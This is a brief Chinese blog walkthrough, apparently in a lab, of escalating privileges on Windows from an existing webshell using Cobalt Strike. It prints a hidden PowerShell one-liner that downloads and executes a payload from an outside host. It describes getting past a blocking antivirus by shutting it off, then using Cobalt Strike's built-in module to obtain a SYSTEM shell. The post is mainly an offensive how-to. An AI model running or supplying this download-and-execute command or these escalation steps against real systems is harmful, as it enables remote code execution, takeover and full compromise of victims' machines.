Windows提权实战

Windows提权实战

前提已经拿到了一个webshell

蚁剑的shell

使用CS创建一个Listener,并生成攻击payload

设置

点击launch之后会弹出命令
payload

1
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.211.55.13:8081/a'))"

在蚁剑中执行以上命令发现CS中没有成功上线,看了一眼发现是火绒拦截了

火绒拦截

那就把火绒退掉再试一下👻

成功上线。。。

上线成功

此时使用shell查看权限为普通用户权限

普通权限

尝试提权,使用CS自带的Windows提权模块进行提权,按照流程创建一个TCP的listener,点击开始之后稍等片刻即可得到一个权限为System的shell。

提权

提权成功

评论

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×